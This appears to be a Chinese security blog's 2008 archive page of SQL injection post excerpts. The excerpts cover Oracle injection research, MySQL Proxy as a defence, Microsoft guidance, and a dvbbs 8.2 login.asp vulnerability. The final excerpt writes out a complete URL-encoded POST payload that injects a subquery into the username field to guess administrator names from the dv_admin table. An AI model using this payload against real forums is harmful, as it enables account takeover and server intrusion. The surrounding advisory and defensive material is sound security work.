标签 ‘SQL Injection’ 下的日志

深入挖掘ORACLE内部SQLINJECTION

2008/06/19 20:40 | 鬼仔 | 技术文章 | 消灭0回复

==Ph4nt0m Security Team==

Issue 0x02, Phile #0x06 of 0x0A

|=---------------------------------------------------------------------------=|
|=--------------------=[ 深入挖掘ORACLE内部SQLINJECTION ]=-----------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=-----------------------=[ By kj021320 ]=----------------------=|
|=----------------------=[ <kj021320_at_126.com> ]=---------------------=|
|=---------------------------------------------------------------------------=|

一、前言

好久没写PAPER了,日久之疏懒成性。我觉得在国内的ORACLE攻防技术研究得比较少,比较欠缺。或许是我孤陋寡闻。在国外许许多多的PAPER已经成为了ORACLE攻击技术的经典。
那么接下来的就是跟大家讨论一下关于ORACLE内部SQL注射技术。相信大家都看过我写的《ART OF WEB-SQL-INJECTION第2卷 ORACLE篇 》07年的初的时候,本文已经写好《检测函数注入in ORACLE》。可惜在偶的一次数据丢失中,许多PAPER进了坟墓。如今标题换了为《深入挖掘ORACLE内部SQLINJECTION》,为什么?其实ORACLE的内部SQL注射不单单出自于函数 存储过程,如果你是这样想的话,那就太狭隘了,其实还有好多的地方还是会出现SQL注射的。例如他的TRIGGER,SQLJ,JOB等等…希望本文可以让你在ORACLE攻防中受益,接下来就轮到大家拍砖了。
阅读全文 »

Tags: , ,

MySQL Proxy(解决注入的另一思路)

2008/06/04 18:21 | 鬼仔 | 技术文章 | 消灭0回复

作者:云舒

What is MySQL Proxy?

MySQL Proxy is a simple program that sits between your client and MySQL server(s) that can monitor, analyze or transform their communication. Its flexibility allows for unlimited uses; common ones include: load balancing; failover; query analysis; query filtering and modification; and many more.

可以看到,MySQL Proxy的主要作用是用来做负载均衡,数据库读写分离的。但是需要注意的是,MySQL Proxy还有个强大的扩展功能就是支持Lua语言——魔兽也是使用了Lua来开发游戏,据我所知网易也是——可以参见云风的博客。这样一种扩展,就给了我让他做别的事情的思路——防止注入攻击。
阅读全文 »

Tags: ,

SQL注入攻击-来自微软安全博客的建议

2008/06/04 14:06 | 鬼仔 | 技术文章 | 1 个回复

译者: 韩国峰 原文

简介
SQL注入攻击方式发展愈演愈烈,黑客通过SQL数据库对网站进行非法入侵并修改页面,同时页面上还会被加入恶意软件,持续影响一些网络应用程序。

本文翻译自微软博客上刊载的相关文章,英文原文版权归原作者所有,特此声明。 (特别感谢Neil Carpenter对本文写作提供的帮助)
阅读全文 »

Tags:

微软安全小组公布反制SQL注入的方案

2008/06/02 13:20 | 鬼仔 | 乱七八糟 | 3 个回复

来源:cnbeta

微软安全隐患研究和防御小组发表文章称已经注意到SQL注入攻击方式发展愈演愈烈,黑客通过SQL数据库对网站进行非法入侵并修改页面,同时页面上还会被加入恶意软件,持续影响一些网络应用程序,因此他们针对不同的人群(ITPro,最终用户,Web开发者)提供了一系列不同的方案,将资料列出供您参考.

查看:SQL Injection Attack

Tags: ,

Dvbbs8.2 access/sql 版login.asp远程sql注入漏洞

2008/05/31 20:02 | 鬼仔 | 技术文章 | 5 个回复

鬼仔注:这次来个详细的。

by where(hackerb@126.com)

漏洞描述:
中国应用最广泛的论坛程序,最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.asp
Login.asp 程序在检查隐藏值user用户名的登陆时没有过滤特殊符号,导致可以利用sql注入方式猜解出论坛管理员及所有用户的密码或者执行其它高级的sql语句直接威胁到服务器安全。

漏洞等级:
高危
阅读全文 »

Tags: , ,

dvbbs 8.2 SQL注射漏洞分析

2008/05/31 1:35 | 鬼仔 | 技术文章 | 消灭0回复

来源:80sec

漏洞公告:http://seclists.org/bugtraq/2008/May/0330.html

利用方式:一个典型的sql注射漏洞,按照公告里说的用

password=123123&amp;codestr=71&amp;CookieDate=2&amp;userhidden=2&amp;comeurl=index.asp&amp;submit=%u7ACB%u5373%u767B%u5F55&amp;ajaxPost=1&amp;username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271

就可触发.
阅读全文 »

Tags: ,